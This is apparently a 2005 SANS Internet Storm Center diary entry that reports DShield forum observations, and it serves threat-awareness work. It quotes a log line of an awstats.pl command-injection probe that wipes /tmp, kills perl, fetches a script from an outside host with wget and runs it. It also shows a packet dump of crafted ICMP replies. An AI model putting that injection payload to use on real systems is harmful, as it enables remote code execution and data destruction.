Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Notes from the DShield Forum SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Notes from the DShield Forum
There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations, and are not part of any trends at the moment.

Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //awstats.pl?configdir=
  |echo%20;cd%20/tmp;rm%20-rf%20*;
  killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -

In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
                    flags [none], length: 56)
  219.158.8.221 > xx.xx.xx.xx: 
icmp 36: time exceeded in-transit for IP
  (tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
  xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
 Lenny

216 Posts
Sep 18th 2005
Thread locked Subscribe Sep 18th 2005
1 decade ago

Sign Up for Free or Log In to start participating in the conversation!